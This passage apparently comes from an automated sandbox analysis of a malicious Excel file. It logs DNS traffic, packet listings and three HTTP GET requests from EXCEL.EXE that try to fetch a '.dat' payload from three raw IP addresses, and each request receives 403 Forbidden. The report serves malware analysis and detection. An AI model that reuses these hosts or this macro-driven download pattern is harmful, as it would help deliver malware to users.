                                                                                                                                                May 4, 2021 19:20:12.888983011 CEST4971980192.168.2.3190.14.37.38
                                                                                                                                                May 4, 2021 19:21:16.465325117 CEST8049717185.183.99.115192.168.2.3
                                                                                                                                                May 4, 2021 19:21:16.465867996 CEST4971780192.168.2.3185.183.99.115
                                                                                                                                                May 4, 2021 19:21:16.746532917 CEST804971851.89.73.159192.168.2.3
                                                                                                                                                May 4, 2021 19:21:16.746686935 CEST4971880192.168.2.351.89.73.159
                                                                                                                                                May 4, 2021 19:21:17.888803005 CEST8049719190.14.37.38192.168.2.3
                                                                                                                                                May 4, 2021 19:21:17.888986111 CEST4971980192.168.2.3190.14.37.38
                                                                                                                                                May 4, 2021 19:21:49.888744116 CEST4971980192.168.2.3190.14.37.38
                                                                                                                                                May 4, 2021 19:21:49.890038013 CEST4971880192.168.2.351.89.73.159
                                                                                                                                                May 4, 2021 19:21:49.890605927 CEST4971780192.168.2.3185.183.99.115
                                                                                                                                                May 4, 2021 19:21:49.932981014 CEST804971851.89.73.159192.168.2.3
                                                                                                                                                May 4, 2021 19:21:49.959261894 CEST8049717185.183.99.115192.168.2.3
                                                                                                                                                May 4, 2021 19:21:50.098340988 CEST8049719190.14.37.38192.168.2.3

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                May 4, 2021 19:19:43.244775057 CEST5062053192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:19:43.308959961 CEST53506208.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:19:45.051894903 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:19:45.103636026 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:19:46.187922001 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:19:46.236874104 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:19:46.527903080 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:19:46.586297035 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:19:47.187701941 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:19:47.236378908 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:19:48.487085104 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:19:48.538537025 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:19:49.560442924 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:19:49.609519958 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:19:58.897397995 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:19:58.946151018 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:19:59.927603960 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:00.004244089 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:00.185122013 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:00.233752012 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:00.444386959 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:00.505314112 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:01.460237980 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:01.522084951 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:02.472641945 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:02.532401085 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:03.339519024 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:03.388379097 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:04.571844101 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:04.634526014 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:08.592353106 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:08.687453032 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:09.319070101 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:09.371335983 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:10.440201998 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:10.506504059 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:11.780247927 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:11.831701994 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:12.889134884 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:12.940558910 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:13.820307016 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:13.869175911 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:14.309206963 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:14.366657972 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:14.992536068 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:15.041246891 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:15.881351948 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:15.938786983 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:16.765682936 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:16.768218994 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:16.816934109 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:16.823097944 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:33.208461046 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:33.271044970 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:20:38.170428991 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:20:38.232611895 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:21:03.507142067 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:21:03.555939913 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:21:09.686569929 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:21:09.746424913 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:21:26.447906017 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:21:26.515889883 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:21:47.065803051 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:21:47.114366055 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                May 4, 2021 19:21:49.231921911 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                May 4, 2021 19:21:49.297358036 CEST53565798.8.8.8192.168.2.3

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • 185.183.99.115
                                                                                                                                                • 51.89.73.159
                                                                                                                                                • 190.14.37.38

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                0192.168.2.349717185.183.99.11580C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                May 4, 2021 19:20:11.169095993 CEST1053OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 185.183.99.115
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                May 4, 2021 19:20:11.465409994 CEST1058INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 17:20:14 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                1192.168.2.34971851.89.73.15980C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                May 4, 2021 19:20:11.517842054 CEST1059OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 51.89.73.159
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                May 4, 2021 19:20:11.745215893 CEST1060INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 17:16:41 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                2192.168.2.349719190.14.37.3880C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                May 4, 2021 19:20:11.962588072 CEST1061OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 190.14.37.38
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                May 4, 2021 19:20:12.888844967 CEST1259INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 17:20:12 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:19:19:58
                                                                                                                                                Start date:04/05/2021
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                Imagebase:0x2d0000
                                                                                                                                                File size:27110184 bytes
                                                                                                                                                MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Reset < >